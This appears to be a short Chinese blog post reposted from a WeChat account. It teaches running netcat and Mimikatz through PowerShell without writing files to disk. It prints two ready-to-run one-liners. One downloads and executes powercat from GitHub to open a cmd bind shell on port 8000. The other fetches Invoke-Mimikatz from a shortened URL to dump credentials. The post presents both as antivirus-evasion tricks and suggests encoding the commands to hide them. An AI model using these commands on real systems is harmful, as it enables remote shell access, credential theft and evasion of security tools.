powershell运行netcat

admin

102350
文章

87
评论

2022年4月1日11:23:03评论100 views字数 525阅读1分45秒阅读模式

前言

大家都知道，powershell可以做到在内存中加载运行文件，做到无文件在硬盘上生成。

正文

渗透中大家常用的技巧比如nc监听、mimikatz密码抓取等，今天给大家介绍下利用ps执行nc做到变相免杀。

ps版nc链接如下：

https://github.com/besimorhino/powercat

可以本地执行，也可以远程执行，远程执行命令如下：

powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -l -p 8000 -e cmd"

powershell运行netcat

然后远程连接执行命令即可

powershell运行netcat

当然，如果嫌弃该命令太暴露，可以对其进行编码

powershell运行netcat

mimikatz密码抓取同理

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

原文始发于微信公众号（中国白客联盟）：powershell运行netcat

左青龙
微信扫一扫

右白虎
微信扫一扫

powershell运行netcat

浅谈Kubernetes安全

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

信创 | 国产数据库派别分类

发表评论

在线咨询

微信